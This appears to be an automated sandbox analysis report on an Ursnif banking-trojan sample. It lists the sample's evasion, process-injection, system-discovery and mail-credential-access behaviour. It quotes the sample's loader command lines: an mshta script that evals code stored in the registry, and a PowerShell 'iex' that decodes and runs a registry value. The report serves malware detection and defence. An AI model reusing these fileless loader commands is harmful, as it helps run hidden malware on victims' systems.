Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5156
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3564
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_0540834C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 2_2_054016E1
Source: explorer.exe, 00000024.00000002.616609988.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000024.00000000.411669645.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000024.00000002.622481126.00000000053D7000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0542556E
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05401F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 2_2_05401F12

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: EB0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 3020000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5936
Source: C:\Windows\explorer.exe Thread register set: target process: 6488
Source: C:\Windows\explorer.exe Thread register set: target process: 2092
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: EB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3020000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000024.00000000.411588453.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277A12A cpuid 2_2_0277A12A
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05405F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 2_2_05405F90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027712E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 2_2_027712E8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277A12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 2_2_0277A12A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277A667 GetVersionExA,wsprintfA, 2_2_0277A667
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
